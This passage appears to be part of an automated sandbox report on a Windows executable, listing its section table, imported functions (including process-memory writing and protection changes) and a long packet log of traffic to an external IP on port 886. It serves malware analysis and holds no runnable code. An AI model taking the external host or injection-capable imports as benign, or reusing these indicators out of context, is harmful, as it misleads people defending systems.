.xdata	0xc0000	0xe238	0xe400	be2131928c711537df98e6bb09086a25	False	0.19800233004385964	data	4.816252938142161	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ
.bss	0xcf000	0x1540	0x0	d41d8cd98f00b204e9800998ecf8427e	False	0	empty	0.0	IMAGE_SCN_CNT_UNINITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.idata	0xd1000	0x11f4	0x1200	f1964cffa3b7ca29bceeefbe830667ff	False	0.3244357638888889	data	4.526525535952229	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.CRT	0xd3000	0x68	0x200	3b51fd9ec324e0ce6ab0cb192f1d96e5	False	0.0703125	data	0.2709192282599745	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.tls	0xd4000	0x68	0x200	06dd6a0492bbcfdb7ef9d5b3f34e3a81	False	0.060546875	data	0.20544562813451883	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_2BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_512BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
/4	0xd5000	0xe0	0x200	a434e0b0624408b1d91065c292d6fa91	False	0.15234375	data	0.7269007807662837	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/19	0xd6000	0x14b69	0x14c00	bc76fed4c2b26e152d40e9417455614f	False	0.3358316076807229	data	6.012863363714152	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/31	0xeb000	0xbec	0xc00	6cf2d3fcedc2ccae03538290c41ffcaf	False	0.3037109375	data	4.690951422906506	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/45	0xec000	0xec3	0x1000	c0ab4e17614a0dab62ca3eba694e1218	False	0.402099609375	data	5.440624976779073	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/57	0xed000	0x768	0x800	a38622b87cbce26cf82e45c23a4842b3	False	0.34814453125	data	3.7229551502388647	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_8BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_32BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_2048BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_8192BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/70	0xee000	0x20b	0x400	3bd730ecf220a3b05f55f508840a705e	False	0.263671875	data	3.194491636401756	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/81	0xef000	0x1e51	0x2000	c3d65d88cb67f112016f68a358289acb	False	0.197021484375	data	2.144141786454237	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
/92	0xf1000	0x1a0	0x200	b77688d503e1574bbd3d1e34f11b5ad5	False	0.203125	data	1.112877479268552	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_ALIGN_1BYTES, IMAGE_SCN_ALIGN_4BYTES, IMAGE_SCN_ALIGN_16BYTES, IMAGE_SCN_ALIGN_64BYTES, IMAGE_SCN_ALIGN_256BYTES, IMAGE_SCN_ALIGN_1024BYTES, IMAGE_SCN_ALIGN_4096BYTES, IMAGE_SCN_ALIGN_MASK, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Imports

DLL	Import
ADVAPI32.dll	RegCloseKey, RegOpenKeyExA, RegQueryValueExA
KERNEL32.dll	AddVectoredExceptionHandler, CloseHandle, CreateSemaphoreW, DeleteCriticalSection, EnterCriticalSection, GetCurrentProcess, GetCurrentProcessId, GetCurrentThreadId, GetLastError, GetModuleHandleA, GetModuleHandleW, GetProcAddress, GetStartupInfoA, GetSystemInfo, GetSystemTimeAsFileTime, GetTickCount, InitializeCriticalSection, IsDBCSLeadByteEx, LeaveCriticalSection, MultiByteToWideChar, QueryPerformanceCounter, RaiseException, ReadProcessMemory, ReleaseSemaphore, RtlAddFunctionTable, RtlCaptureContext, RtlLookupFunctionEntry, RtlUnwindEx, RtlVirtualUnwind, SetLastError, SetUnhandledExceptionFilter, Sleep, TerminateProcess, TlsAlloc, TlsFree, TlsGetValue, TlsSetValue, UnhandledExceptionFilter, VirtualAlloc, VirtualProtect, VirtualQuery, VirtualQueryEx, WaitForSingleObject, WideCharToMultiByte, WriteProcessMemory
msvcrt.dll	__C_specific_handler, ___lc_codepage_func, __dllonexit, __doserrno, __getmainargs, __initenv, __iob_func, __lconv_init, __mb_cur_max, __pioinfo, __set_app_type, __setusermatherr, _acmdln, _amsg_exit, _cexit, _errno, _fdopen, _filelengthi64, _fileno, _fileno, _fmode, _fstat64, _initterm, _lock, _lseeki64, _onexit, _read, _strnicmp, _unlock, _write, _write, abort, calloc, exit, fclose, fflush, fgetpos, fopen, fprintf, fputc, fputs, fread, free, fsetpos, fwrite, getc, getenv, getwc, isspace, iswctype, localeconv, malloc, memchr, memcmp, memcpy, memmove, memset, putc, putwc, realloc, setlocale, setvbuf, signal, sprintf, strcmp, strcoll, strerror, strftime, strlen, strncmp, strtoul, strxfrm, towlower, towupper, ungetc, ungetwc, vfprintf, wcscoll, wcsftime, wcslen, wcsxfrm

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 20, 2024 15:21:54.418008089 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:54.723381996 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:54.723669052 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:54.723893881 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.026654959 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027054071 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027096987 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027136087 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027174950 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027177095 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027178049 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027266979 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027266979 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027273893 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027318001 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027347088 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027357101 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027373075 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027403116 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027405024 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027446032 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027462006 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027487040 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.027502060 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.027542114 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332171917 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332235098 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332252979 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332277060 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332309008 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332319021 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332329035 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332361937 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332372904 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332401037 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332428932 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332439899 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332462072 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332479000 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332511902 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332519054 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332539082 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332562923 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332570076 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332604885 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332612038 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332643032 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332665920 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332680941 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332700014 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332719088 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332748890 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332761049 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332783937 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332801104 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332829952 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332840919 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.332866907 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.332896948 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635483027 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635531902 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635576010 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635580063 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635627985 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635627985 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635740995 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635777950 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635796070 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635813951 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635828018 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635853052 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635867119 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635890961 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635910988 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635929108 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635940075 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.635966063 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.635982037 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636004925 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636018038 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636044979 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636060953 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636081934 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636096954 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636141062 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636145115 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636176109 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636194944 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636209011 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636210918 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636229038 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636244059 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636245966 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636264086 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636281967 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636281967 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636298895 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636302948 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636317968 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636327028 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636337996 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636357069 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636369944 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636377096 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636394024 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636396885 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636415958 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636426926 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636434078 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636451006 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636461020 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636468887 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636486053 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636493921 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636502981 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.636539936 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636540890 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.636626005 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.938548088 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.938613892 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.938652992 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.938692093 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.938719988 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.938769102 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.938769102 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.938769102 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939439058 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939506054 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939519882 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939546108 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939553976 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939589977 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939603090 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939630985 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939647913 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939682961 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939703941 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939723015 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939733982 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939760923 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939779043 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939799070 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939815044 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939838886 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939857006 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939882994 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939903975 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939920902 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939934015 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939960003 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.939974070 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.939999104 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940013885 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940037966 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940069914 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940079927 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940119982 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940140009 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940150976 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940195084 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940213919 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940233946 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940252066 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940270901 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940289021 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940310955 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940325022 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940351963 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940368891 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940391064 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940409899 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940428972 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940450907 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940466881 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940485001 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940504074 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940522909 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940542936 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940562963 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940582037 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940604925 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940618992 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940629005 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940656900 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940674067 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940695047 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940718889 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940733910 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940753937 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940772057 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940792084 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940809965 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940825939 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940850019 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940864086 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940888882 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940898895 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940928936 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940946102 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.940967083 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.940980911 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941005945 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941021919 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941046000 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941061974 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941085100 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941102982 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941123009 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941138983 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941159964 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941183090 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941200018 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941212893 CEST	49706	886	192.168.2.5	118.89.125.171
Apr 20, 2024 15:21:55.941237926 CEST	886	49706	118.89.125.171	192.168.2.5
Apr 20, 2024 15:21:55.941255093 CEST	49706	886	192.168.2.5	118.89.125.171
